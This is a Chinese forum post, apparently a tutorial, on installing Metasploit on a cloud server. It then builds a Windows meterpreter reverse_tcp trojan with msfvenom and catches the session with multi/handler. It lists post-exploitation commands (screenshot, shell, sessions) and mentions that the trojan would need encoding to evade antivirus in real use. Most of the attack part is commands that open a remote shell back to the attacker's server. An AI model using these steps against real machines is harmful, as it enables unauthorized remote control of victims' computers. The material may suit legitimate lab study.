搜索
查看: 2016|回复: 0

云服务器上安装MSF环境

[复制链接]

273

主题

389

帖子

858

积分

vip用户

Rank: 6Rank: 6

积分
858

注册会员活跃会员热心会员

QQ
发表于 2019-9-14 22:52:27 来自手机 | 显示全部楼层 |阅读模式
0x00 安装MSF
使用Xshell等工具连上远程服务器后,首先确保服务器的网络是可以正常访问外网的

使用curl http://dyboy.cn 测试一下

网络没问题,接下来命令如下

// 切换目录
cd /home

// 获取MSF安装脚本
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

// 修改权限
chmod 755 msfinstall

// 开始安装
./msfinstall
等待一会儿就安装好了,服务器的入网带宽是非常高的,即服务器的下载速度很快

0x01 安装postgresql
因为MSF需要记录一些数据,依赖于postgresql,因此还需要安装

同样在当前home目录下

// 获取安装
apt-get install postgresql

// 切换到postgres用户
su postgres

// 登录postgresql数据库,首次登录没有密码
psql

// 修改数据库用户postgres的密码
\password postgres

// 退出
\q

// 初始化
msfdb init
0X02 MSF初体验
// 生成小马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe

// 进入msf
msfconsole

// 监听
use exploit/multi/handler

// 设置payload
set payload windows/meterpreter/reverse_tcp

// 设置
set LHOST 0.0.0.0

set LPORT 服务器监听端口

// 运行
run
在实际环境当中还需要对小马文件编码免杀等操作

本地电脑执行test.exe文件

服务端获取会话

获取会话

获取到的是以当前执行木马用户的身份

会话身份

// 将会话维持
background

// 罗列会话
sessions

// 进入会话
sesions 会话id

// 获取目标主机屏幕截图
screenshot

// 进入目标主机的Shell
shell

// 退出shell
exit

// 更多内容可以通过帮助查看
help
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表